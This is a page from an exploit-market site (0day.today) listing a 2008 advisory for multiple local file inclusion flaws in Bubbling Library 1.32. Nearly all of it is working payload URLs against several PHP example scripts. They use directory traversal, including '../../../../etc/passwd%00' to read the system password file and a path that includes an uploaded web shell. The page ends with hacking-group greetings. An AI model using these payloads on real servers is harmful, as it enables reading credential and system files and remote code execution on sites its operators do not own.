[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bubbling Library 1.32 Multiple Local File Inclusion Vulnerabilities

Author
Stack
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2554
Category
web applications
Date add
26-01-2008
Platform
unsorted
===================================================================
Bubbling Library 1.32 Multiple Local File Inclusion Vulnerabilities 
===================================================================



## bubbling library v1.32   multiple Local File Inclusion Vulnerabilities  
## Author : Stack-Terrorist [v40]

## Home : http://www.v4-team.com
## for execute exploit does not write extention of file
## Other files:    =../../../../etc/passwd%00 
## exploit :
#  
# examples/dispatcher/framework/simple.php?page=[local file]&tpl=ajax
http://localhost/ [script] /examples/dispatcher/framework/simple.php?page=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.php?page=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.tpl.php?uri=../[name of file wthout php]
# examples/dispatcher/framework/simple.php?page=/home/user/shell
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.tpl.php?uri=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/simple.tpl.php?uri=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.php?page=../[name of file wthout php]

Greetz :  H-T Team , v4 Team  , Tryag , no-hack all my friend  
Special tnx for : Houssamix
thx for: Proamk  - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y 


#  0day.today [2024-12-23]  #